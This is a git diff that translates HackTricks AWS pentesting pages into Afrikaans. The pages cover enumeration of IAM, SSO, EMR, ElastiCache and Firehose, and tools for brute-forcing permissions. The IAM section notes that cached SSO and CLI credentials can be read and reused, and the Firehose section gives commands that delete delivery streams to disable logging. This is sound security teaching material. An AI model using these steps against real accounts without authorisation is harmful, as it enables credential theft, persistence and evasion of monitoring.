-### Unauthenticated Access
+### Ongeauthentiseerde Toegang
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
 {{#endref}}
 
-### Persistence
+### Volharding
 
 {{#ref}}
 ../aws-persistence/aws-elastic-beanstalk-persistence.md
 {{#endref}}
 
-### Privesc
+### Privilege Escalation
 
 {{#ref}}
 ../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md
 {{#endref}}
 
-### Post Exploitation
+### Post Exploitatie
 
 {{#ref}}
 ../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
index 6305fcc91..2c125e511 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
@@ -4,10 +4,9 @@
 
 ## ElastiCache
 
-AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**.
+AWS ElastiCache is 'n volledig **bestuurde in-geheue data-opslag en kasdiens** wat hoë-prestasie, lae-latensie, en skaalbare oplossings vir toepassings bied. Dit ondersteun twee gewilde oopbron in-geheue enjins: **Redis en Memcached**. ElastiCache **vereenvoudig** die **opstelling**, **bestuur**, en **onderhoud** van hierdie enjins, wat ontwikkelaars in staat stel om tydrowende take soos voorsiening, patching, monitering, en **rugsteun** te ontlaai.
 
 ### Enumeration
-
 ```bash
 # ElastiCache clusters
 ## Check the SecurityGroups to later check who can access
@@ -39,11 +38,6 @@ aws elasticache describe-users
 # List ElastiCache events
 aws elasticache describe-events
 ```
-
 ### Privesc (TODO)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
index b05012f3e..69756455d 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
@@ -4,38 +4,37 @@
 
 ## EMR
 
-AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark.
+AWS se Elastic MapReduce (EMR) diens, wat begin met weergawe 4.8.0, het 'n **veiligheidskonfigurasie** kenmerk bekendgestel wat databeskydding verbeter deur gebruikers toe te laat om versleutelinginstellings vir data in rus en in oordrag binne EMR-klusters, wat skaalbare groepe van EC2-instanties is wat ontwerp is om groot data-raamwerke soos Apache Hadoop en Spark te verwerk, te spesifiseer.
 
-Key characteristics include:
+Belangrike kenmerke sluit in:
 
-- **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features:
-  - **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider.
-  - **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop:
-    - Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer.
-    - HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm.
-- **Encryption in Transit**: Focuses on securing data during transfer. Options include:
-  - **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider:
-    - **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket.
-    - **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts.
+- **Kluster Versleuteling Standaard**: Standaard is data in rus binne 'n kluster nie versleuteld nie. Dit is egter moontlik om versleuteling in te skakel wat toegang tot verskeie funksies bied:
+- **Linux Unified Key Setup**: Versleutelt EBS-klustervolumes. Gebruikers kan kies vir AWS Key Management Service (KMS) of 'n pasgemaakte sleutelverskaffer.
+- **Open-Source HDFS Versleuteling**: Bied twee versleutelingopsies vir Hadoop:
+- Veilige Hadoop RPC (Remote Procedure Call), gestel op privaatheid, wat die Simple Authentication Security Layer benut.
+- HDFS Blok oordrag versleuteling, gestel op waar, gebruik die AES-256 algoritme.
+- **Versleuteling in Oordrag**: Fokus op die beveiliging van data tydens oordrag. Opsies sluit in:
+- **Open Source Transport Layer Security (TLS)**: Versleuteling kan geaktiveer word deur 'n sertifikaatverskaffer te kies:
+- **PEM**: Vereis handmatige skepping en bundeling van PEM-sertifikate in 'n zip-lêer, waarna verwys word vanaf 'n S3-bucket.
+- **Pasgemaak**: Betrek die toevoeging van 'n pasgemaakte Java-klas as 'n sertifikaatverskaffer wat versleutelingartefakte verskaf.
 
-Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version:
+Sodra 'n TLS-sertifikaatverskaffer in die veiligheidskonfigurasie geïntegreer is, kan die volgende toepassingspesifieke versleutelingkenmerke geaktiveer word, wat wissel op grond van die EMR-weergawe:
 
 - **Hadoop**:
-  - Might reduce encrypted shuffle using TLS.
-  - Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption.
-- **Presto** (EMR version 5.6.0+):
-  - Internal communication between Presto nodes is secured using SSL and TLS.
+- Mag versleutelde shuffle met TLS verminder.
+- Veilige Hadoop RPC met Simple Authentication Security Layer en HDFS Blok Oordrag met AES-256 word geaktiveer met versleuteling in rus.
+- **Presto** (EMR weergawe 5.6.0+):
+- Interne kommunikasie tussen Presto-knope is beveilig met SSL en TLS.
 - **Tez Shuffle Handler**:
-  - Utilizes TLS for encryption.
+- Gebruik TLS vir versleuteling.
 - **Spark**:
-  - Employs TLS for the Akka protocol.
-  - Uses Simple Authentication Security Layer and 3DES for Block Transfer Service.
-  - External shuffle service is secured with the Simple Authentication Security Layer.
+- Gebruik TLS vir die Akka-protokol.
+- Gebruik Simple Authentication Security Layer en 3DES vir Blok Oordragdiens.
+- Eksterne shuffle diens is beveilig met die Simple Authentication Security Layer.
 
-These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases.
+Hierdie kenmerke verbeter saam die sekuriteitsposisie van EMR-klusters, veral met betrekking tot databeskydding tydens berging en oordragfases.
 
 #### Enumeration
-
 ```bash
 aws emr list-clusters
 aws emr describe-cluster --cluster-id <id>
@@ -46,19 +45,14 @@ aws emr list-notebook-executions
 aws emr list-security-configurations
 aws emr list-studios #Get studio URLs
 ```
-
 #### Privesc
 
 {{#ref}}
 ../aws-privilege-escalation/aws-emr-privesc.md
 {{#endref}}
 
-## References
+## Verwysings
 
 - [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
index 7a430cc17..8808e6969 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
@@ -1,20 +1,20 @@
-# AWS - IAM, Identity Center & SSO Enum
+# AWS - IAM, Identiteitsentrum & SSO Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## IAM
 
-You can find a **description of IAM** in:
+Jy kan 'n **beskrywing van IAM** vind in:
 
 {{#ref}}
 ../aws-basic-information/
 {{#endref}}
 
-### Enumeration
+### Enumerasie
 
-Main permissions needed:
+Hoof toestemmings benodig:
 
-- `iam:ListPolicies`, `iam:GetPolicy` and `iam:GetPolicyVersion`
+- `iam:ListPolicies`, `iam:GetPolicy` en `iam:GetPolicyVersion`
 - `iam:ListRoles`
 - `iam:ListUsers`
 - `iam:ListGroups`
@@ -22,10 +22,9 @@ Main permissions needed:
 - `iam:ListAttachedUserPolicies`
 - `iam:ListAttachedRolePolicies`
 - `iam:ListAttachedGroupPolicies`
-- `iam:ListUserPolicies` and `iam:GetUserPolicy`
-- `iam:ListGroupPolicies` and `iam:GetGroupPolicy`
-- `iam:ListRolePolicies` and `iam:GetRolePolicy`
-
+- `iam:ListUserPolicies` en `iam:GetUserPolicy`
+- `iam:ListGroupPolicies` en `iam:GetGroupPolicy`
+- `iam:ListRolePolicies` en `iam:GetRolePolicy`
 ```bash
 # All IAMs
 ## Retrieves  information about all IAM users, groups, roles, and policies
@@ -89,64 +88,54 @@ aws iam get-account-password-policy
 aws iam list-mfa-devices
 aws iam list-virtual-mfa-devices
 ```
+### Toestemmings Brute Force
 
-### Permissions Brute Force
-
-If you are interested in your own permissions but you don't have access to query IAM you could always brute-force them.
+As jy belangstel in jou eie toestemmings, maar jy het nie toegang om IAM te ondervra nie, kan jy altyd brute-force hulle.
 
 #### bf-aws-permissions
 
-The tool [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) is just a bash script that will run using the indicated profile all the **`list*`, `describe*`, `get*`** actions it can find using `aws` cli help messages and **return the successful executions**.
-
+Die hulpmiddel [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) is net 'n bash-skrip wat sal loop met die aangeduide profiel al die **`list*`, `describe*`, `get*`** aksies wat dit kan vind met behulp van `aws` cli hulpboodskappe en **teruggee die suksesvolle uitvoerings**.
 ```bash
 # Bruteforce permissions
 bash bf-aws-permissions.sh -p default > /tmp/bf-permissions-verbose.txt
 ```
-
 #### bf-aws-perms-simulate
 
-The tool [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) can find your current permission (or the ones of other principals) if you have the permission **`iam:SimulatePrincipalPolicy`**
-
+Die hulpmiddel [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) kan jou huidige toestemmings (of dié van ander principals) vind as jy die toestemming **`iam:SimulatePrincipalPolicy`** het.
 ```bash
 # Ask for permissions
 python3 aws_permissions_checker.py --profile <AWS_PROFILE> [--arn <USER_ARN>]
 ```
-
 #### Perms2ManagedPolicies
 
-If you found **some permissions your user has**, and you think that they are being granted by a **managed AWS role** (and not by a custom one). You can use the tool [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) to check all the **AWS managed roles that grants the permissions you discovered that you have**.
-
+As jy **sekere toestemmings gevind het wat jou gebruiker het**, en jy dink dat dit toegeken word deur 'n **bestuurde AWS rol** (en nie deur 'n pasgemaakte een nie). Jy kan die hulpmiddel [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) gebruik om al die **AWS bestuurde rolle wat die toestemmings wat jy ontdek het dat jy het, toeken** te kontroleer.
 ```bash
 # Run example with my profile
 python3 aws-Perms2ManagedPolicies.py --profile myadmin --permissions-file example-permissions.txt
 ```
-
 > [!WARNING]
-> It's possible to "know" if the permissions you have are granted by an AWS managed role if you see that **you have permissions over services that aren't used** for example.
+> Dit is moontlik om te "weet" of die toestemmings wat jy het, toegeken is deur 'n AWS bestuurde rol as jy sien dat **jy toestemmings oor dienste het wat nie gebruik word nie** byvoorbeeld.
 
 #### Cloudtrail2IAM
 
-[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) is a Python tool that analyses **AWS CloudTrail logs to extract and summarize actions** done by everyone or just an specific user or role. The tool will **parse every cloudtrail log from the indicated bucket**.
-
+[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) is 'n Python-gereedskap wat **AWS CloudTrail logs analiseer om aksies** wat deur almal of net 'n spesifieke gebruiker of rol gedoen is, te onttrek en saam te vat. Die gereedskap sal **elke cloudtrail log van die aangeduide emmer parse**.
 ```bash
 git clone https://github.com/carlospolop/Cloudtrail2IAM
 cd Cloudtrail2IAM
 pip install -r requirements.txt
 python3 cloudtrail2IAM.py --prefix PREFIX --bucket_name BUCKET_NAME --profile PROFILE [--filter-name FILTER_NAME] [--threads THREADS]
 ```
-
 > [!WARNING]
-> If you find .tfstate (Terraform state files) or CloudFormation files (these are usually yaml files located inside a bucket with the prefix cf-templates), you can also read them to find aws configuration and find which permissions have been assigned to who.
+> As jy .tfstate (Terraform toestand lêers) of CloudFormation lêers (dit is gewoonlik yaml lêers wat binne 'n emmer met die voorvoegsel cf-templates geleë is) vind, kan jy dit ook lees om aws konfigurasie te vind en te sien watter toestemmings aan wie toegeken is.
 
 #### enumerate-iam
 
-To use the tool [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam) you first need to download all the API AWS endpoints, from those the script **`generate_bruteforce_tests.py`** will get all the **"list\_", "describe\_", and "get\_" endpoints.** And finally, it will try to **access them** with the given credentials and **indicate if it worked**.
+Om die hulpmiddel [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam) te gebruik, moet jy eers al die API AWS eindpunte aflaai, van daardie sal die skrip **`generate_bruteforce_tests.py`** al die **"list\_", "describe\_", en "get\_" eindpunte kry.** En uiteindelik sal dit probeer om **toegang tot hulle** te verkry met die gegewe akrediteer en **aangee of dit gewerk het**.
 
-(In my experience the **tool hangs at some point**, [**checkout this fix**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) to try to fix that).
+(Volgens my ervaring hang die **hulpmiddel op 'n sekere punt**, [**kyk na hierdie oplossing**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) om te probeer om dit reg te stel).
 
 > [!WARNING]
-> In my experience this tool is like the previous one but working worse and checking less permissions
-
+> Volgens my ervaring is hierdie hulpmiddel soos die vorige, maar werk erger en kontroleer minder toestemmings.
 ```bash
 # Install tool
 git clone git@github.com:andresriancho/enumerate-iam.git
@@ -163,11 +152,9 @@ cd ..
 # Enumerate permissions
 python3 enumerate-iam.py --access-key ACCESS_KEY --secret-key SECRET_KEY [--session-token SESSION_TOKEN] [--region REGION]
 ```
-
 #### weirdAAL
 
-You could also use the tool [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki). This tool will check **several common operations on several common services** (will check some enumeration permissions and also some privesc permissions). But it will only check the coded checks (the only way to check more stuff if coding more tests).
-
+Jy kan ook die hulpmiddel [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki) gebruik. Hierdie hulpmiddel sal **verskeie algemene operasies op verskeie algemene dienste nagaan** (sal 'n paar enumerasie-toestemmings en ook 'n paar privesc-toestemmings nagaan). Maar dit sal slegs die gekodeerde toetse nagaan (die enigste manier om meer goed na te gaan is om meer toetse te kodeer).
 ```bash
 # Install
 git clone https://github.com/carnal0wnage/weirdAAL.git
@@ -191,12 +178,10 @@ python3 weirdAAL.py -m recon_all -t MyTarget # Check all permissions
 # [+] elbv2 Actions allowed are [+]
 # ['DescribeLoadBalancers', 'DescribeAccountLimits', 'DescribeTargetGroups']
 ```
-
-#### Hardening Tools to BF permissions
+#### Versterking van Gereedskap om BF-toestemmings
 
 {{#tabs }}
 {{#tab name="CloudSploit" }}
-
 ```bash
 # Export env variables
 ./index.js --console=text --config ./config.js --json /tmp/out-cloudsploit.json
@@ -207,11 +192,9 @@ jq 'map(select(.status | contains("UNKNOWN") | not))' /tmp/out-cloudsploit.json
 # Get services by regions
 jq 'group_by(.region) | map({(.[0].region): ([map((.resource | split(":"))[2]) | unique])})' ~/Desktop/pentests/cere/greybox/core-dev-dev-cloudsploit-filtered.json
 ```
-
 {{#endtab }}
 
 {{#tab name="SteamPipe" }}
-
 ```bash
 # https://github.com/turbot/steampipe-mod-aws-insights
 steampipe check all --export=json
@@ -220,15 +203,14 @@ steampipe check all --export=json
 # In this case you cannot output to JSON, so heck it in the dashboard
 steampipe dashboard
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 #### \<YourTool>
 
-Neither of the previous tools is capable of checking close to all permissions, so if you know a better tool send a PR!
+Geen van die vorige gereedskap is in staat om naby al die toestemmings te kontroleer nie, so as jy 'n beter gereedskap ken, stuur 'n PR!
 
-### Unauthenticated Access
+### Ongeauthentiseerde Toegang
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md
@@ -236,7 +218,7 @@ Neither of the previous tools is capable of checking close to all permissions, s
 
 ### Privilege Escalation
 
-In the following page you can check how to **abuse IAM permissions to escalate privileges**:
+Op die volgende bladsy kan jy kyk hoe om **IAM-toestemmings te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-iam-privesc.md
@@ -248,22 +230,21 @@ In the following page you can check how to **abuse IAM permissions to escalate p
 ../aws-post-exploitation/aws-iam-post-exploitation.md
 {{#endref}}
 
-### IAM Persistence
+### IAM Persistensie
 
 {{#ref}}
 ../aws-persistence/aws-iam-persistence.md
 {{#endref}}
 
-## IAM Identity Center
+## IAM Identiteitsentrum
 
-You can find a **description of IAM Identity Center** in:
+Jy kan 'n **beskrywing van IAM Identiteitsentrum** vind in:
 
 {{#ref}}
 ../aws-basic-information/
 {{#endref}}
 
-### Connect via SSO with CLI
-
+### Verbinding via SSO met CLI
 ```bash
 # Connect with sso via CLI aws configure sso
 aws configure sso
@@ -274,20 +255,18 @@ sso_account_id = <account_numbre>
 sso_role_name = AdministratorAccess
 sso_region = us-east-1
 ```
-
 ### Enumeration
 
-The main elements of the Identity Center are:
+Die hoofelemente van die Identiteitsentrum is:
 
-- Users and groups
-- Permission Sets: Have policies attached
-- AWS Accounts
+- Gebruikers en groepe
+- Toestemmingsstelle: Het beleide aangeheg
+- AWS-rekeninge
 
-Then, relationships are created so users/groups have Permission Sets over AWS Account.
+Dan word verhoudings geskep sodat gebruikers/groepe Toestemmingsstelle oor AWS-rekening het.
 
 > [!NOTE]
-> Note that there are 3 ways to attach policies to a Permission Set. Attaching AWS managed policies, Customer managed policies (these policies needs to be created in all the accounts the Permissions Set is affecting), and inline policies (defined in there).
-
+> Let daarop dat daar 3 maniere is om beleide aan 'n Toestemmingsstel te heg. Heg AWS bestuurde beleide, Kliënt bestuurde beleide (hierdie beleide moet in al die rekeninge geskep word wat die Toestemmingsstel beïnvloed), en inline beleide (gedefinieer daar).
 ```bash
 # Check if IAM Identity Center is used
 aws sso-admin list-instances
@@ -321,11 +300,9 @@ aws identitystore list-group-memberships --identity-store-id <store-id> --group-
 ## Get memberships or a user or a group
 aws identitystore list-group-memberships-for-member --identity-store-id <store-id> --member-id <member-id>
 ```
+### Plaaslike Enumerasie
 
-### Local Enumeration
-
-It's possible to create inside the folder `$HOME/.aws` the file config to configure profiles that are accessible via SSO, for example:
-
+Dit is moontlik om binne die gids `$HOME/.aws` die lêer config te skep om profiele te konfigureer wat via SSO toeganklik is, byvoorbeeld:
 ```ini
 [default]
 region = us-west-2
@@ -343,20 +320,16 @@ output = json
 role_arn = arn:aws:iam::<acc-id>:role/ReadOnlyRole
 source_profile = Hacktricks-Admin
 ```
-
-This configuration can be used with the commands:
-
+Hierdie konfigurasie kan gebruik word met die opdragte:
 ```bash
 # Login in ms-sso-profile
 aws sso login --profile my-sso-profile
 # Use dependent-profile
 aws s3 ls --profile dependent-profile
 ```
+Wanneer 'n **profiel van SSO gebruik word** om toegang tot sekere inligting te verkry, word die geloofsbriewe **in 'n lêer in die gids **`$HOME/.aws/sso/cache`** gestoor. Daarom kan dit **gelees en daar gebruik word**.
 
-When a **profile from SSO is used** to access some information, the credentials are **cached** in a file inside the folder **`$HOME/.aws/sso/cache`**. Therefore they can be **read and used from there**.
-
-Moreover, **more credentials** can be stored in the folder **`$HOME/.aws/cli/cache`**. This cache directory is primarily used when you are **working with AWS CLI profiles** that use IAM user credentials or **assume** roles through IAM (without SSO). Config example:
-
+Boonop kan **meer geloofsbriewe** in die gids **`$HOME/.aws/cli/cache`** gestoor word. Hierdie cache-gids word hoofsaaklik gebruik wanneer jy **met AWS CLI-profiele werk** wat IAM-gebruiker geloofsbriewe gebruik of **aanneem** rolle deur IAM (sonder SSO). Konfigurasie voorbeeld:
 ```ini
 [profile crossaccountrole]
 role_arn = arn:aws:iam::234567890123:role/SomeRole
@@ -364,8 +337,7 @@ source_profile = default
 mfa_serial = arn:aws:iam::123456789012:mfa/saanvi
 external_id = 123456
 ```
-
-### Unauthenticated Access
+### Ongeauthentiseerde Toegang
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md
@@ -383,24 +355,18 @@ external_id = 123456
 ../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md
 {{#endref}}
 
-### Persistence
-
-#### Create a user an assign permissions to it
+### Volharding
 
+#### Skep 'n gebruiker en ken toestemmings aan dit toe
 ```bash
 # Create user identitystore:CreateUser
 aws identitystore create-user --identity-store-id <store-id> --user-name privesc --display-name privesc --emails Value=sdkabflvwsljyclpma@tmmbt.net,Type=Work,Primary=True --name Formatted=privesc,FamilyName=privesc,GivenName=privesc
 ## After creating it try to login in the console using the selected username, you will receive an email with the code and then you will be able to select a password
 ```
+- Skep 'n groep en ken dit toestemmings toe en stel 'n beheerde gebruiker daarop in
+- Gee ekstra toestemmings aan 'n beheerde gebruiker of groep
+- Standaard sal slegs gebruikers met toestemmings van die Bestuursrekening toegang hê tot en beheer oor die IAM Identiteitsentrum.
 
-- Create a group and assign it permissions and set on it a controlled user
-- Give extra permissions to a controlled user or group
-- By default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center.
-
-  However, it's possible via Delegate Administrator to allow users from a different account to manage it. They won't have exactly the same permission, but they will be able to perform [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html).
+Dit is egter moontlik om via 'n Gedelegeerde Administrateur gebruikers van 'n ander rekening toe te laat om dit te bestuur. Hulle sal nie presies dieselfde toestemming hê nie, maar hulle sal in staat wees om [**bestuursaktiwiteite**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html) uit te voer.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md
index 6ca66b5ed..9349898cd 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md
@@ -4,12 +4,11 @@
 
 ## Kinesis Data Firehose
 
-Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints.
+Amazon Kinesis Data Firehose is 'n **volledig bestuurde diens** wat die aflewering van **regstreekse stroomdata** fasiliteer. Dit ondersteun 'n verskeidenheid bestemmings, insluitend Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, en pasgemaakte HTTP-eindpunte.
 
-The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases.
+Die diens verlig die behoefte om toepassings te skryf of hulpbronne te bestuur deur data produsente toe te laat om gekonfigureer te word om data direk na Kinesis Data Firehose te stuur. Hierdie diens is verantwoordelik vir die **outomatiese aflewering van data na die gespesifiseerde bestemming**. Daarbenewens bied Kinesis Data Firehose die opsie om die **data voor sy aflewering te transformeer**, wat die buigsaamheid en toepaslikheid daarvan vir verskeie gebruiksgevalle verbeter.
 
 ### Enumeration
-
 ```bash
 # Get delivery streams
 aws firehose list-delivery-streams
@@ -19,37 +18,26 @@ aws firehose describe-delivery-stream --delivery-stream-name <name>
 ## Get roles
 aws firehose describe-delivery-stream --delivery-stream-name <name> | grep -i RoleARN
 ```
-
 ## Post-exploitation / Defense Bypass
 
-In case firehose is used to send logs or defense insights, using these functionalities an attacker could prevent it from working properly.
+In die geval dat firehose gebruik word om logs of verdediging insigte te stuur, kan 'n aanvaller deur hierdie funksies te gebruik, verhoed dat dit behoorlik werk.
 
 ### firehose:DeleteDeliveryStream
-
 ```
 aws firehose delete-delivery-stream --delivery-stream-name <value> --allow-force-delete
 ```
-
 ### firehose:UpdateDestination
-
 ```
 aws firehose update-destination --delivery-stream-name <value> --current-delivery-stream-version-id <value> --destination-id <value>
 ```
-
 ### firehose:PutRecord | firehose:PutRecordBatch
-
 ```
 aws firehose put-record --delivery-stream-name my-stream --record '{"Data":"SGVsbG8gd29ybGQ="}'
 
 aws firehose put-record-batch --delivery-stream-name my-stream --records file://records.json
 ```
-
-## References
+## Verwysings
 
 - [https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html](https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md
index 543ed31cd..c5965741d 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md
@@ -2,128 +2,125 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## KMS - Key Management Service
+## KMS - Sleutelbestuurdiens
 
-AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys.
+AWS Sleutelbestuurdiens (AWS KMS) word aangebied as 'n bestuurde diens, wat die proses vir gebruikers vereenvoudig om **klant meester sleutels** (CMKs) te **skep en te bestuur**. Hierdie CMKs is integraal in die versleuteling van gebruikersdata. 'n Opmerkelijke kenmerk van AWS KMS is dat CMKs hoofsaaklik **beveilig word deur hardeware sekuriteitsmodules** (HSMs), wat die beskerming van die versleuteling sleutels verbeter.
 
-KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**.
+KMS gebruik **simmetriese kriptografie**. Dit word gebruik om **inligting in rus te versleutelen** (byvoorbeeld, binne 'n S3). As jy **inligting in oordrag wil versleutelen**, moet jy iets soos **TLS** gebruik.
 
-KMS is a **region specific service**.
+KMS is 'n **streekspesifieke diens**.
 
-**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used.
+**Administrateurs by Amazon het nie toegang tot jou sleutels nie**. Hulle kan nie jou sleutels herstel nie en hulle help jou nie met die versleuteling van jou sleutels nie. AWS bestuur eenvoudig die bedryfstelsel en die onderliggende toepassing; dit is aan ons om ons versleuteling sleutels te bestuur en te bestuur hoe daardie sleutels gebruik word.
 
-**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data.
+**Klant Meester Sleutels** (CMK): Kan data tot 4KB in grootte versleutelen. Hulle word tipies gebruik om die DEKs (Data Versleuteling Sleutels) te skep, versleutelen en ontsleutelen. Dan word die DEKs gebruik om die data te versleutelen.
 
-A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK.
+'n Klant meester sleutel (CMK) is 'n logiese voorstelling van 'n meester sleutel in AWS KMS. Benewens die meester sleutel se identifiseerders en ander metadata, insluitend sy skeppingsdatum, beskrywing en sleuteltoestand, **bevat 'n CMK die sleutelmateriaal wat gebruik word om data te versleutelen en ontsleutelen**. Wanneer jy 'n CMK skep, genereer AWS KMS standaard die sleutelmateriaal vir daardie CMK. Jy kan egter kies om 'n CMK sonder sleutelmateriaal te skep en dan jou eie sleutelmateriaal in daardie CMK te invoer.
 
-There are 2 types of master keys:
+Daar is 2 tipes meester sleutels:
 
-- **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it.
-- **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys.
+- **AWS bestuurde CMKs: Gebruik deur ander dienste om data te versleutelen**. Dit word gebruik deur die diens wat dit in 'n streek geskep het. Hulle word geskep die eerste keer wat jy die versleuteling in daardie diens implementeer. Dit draai elke 3 jaar en dit is nie moontlik om dit te verander nie.
+- **Klant bestuurder CMKs**: Buigsaamheid, rotasie, konfigureerbare toegang en sleutelbeleid. Aktiveer en deaktiveer sleutels.
 
-**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**.
+**Envelope Versleuteling** in die konteks van Sleutelbestuurdiens (KMS): Twee-laag hiërargie stelsel om **data met data sleutel te versleutelen en dan data sleutel met meester sleutel te versleutelen**.
 
-### Key Policies
+### Sleutelbeleide
 
-These defines **who can use and access a key in KMS**.
+Hierdie definieer **wie 'n sleutel in KMS kan gebruik en toegang hê**.
 
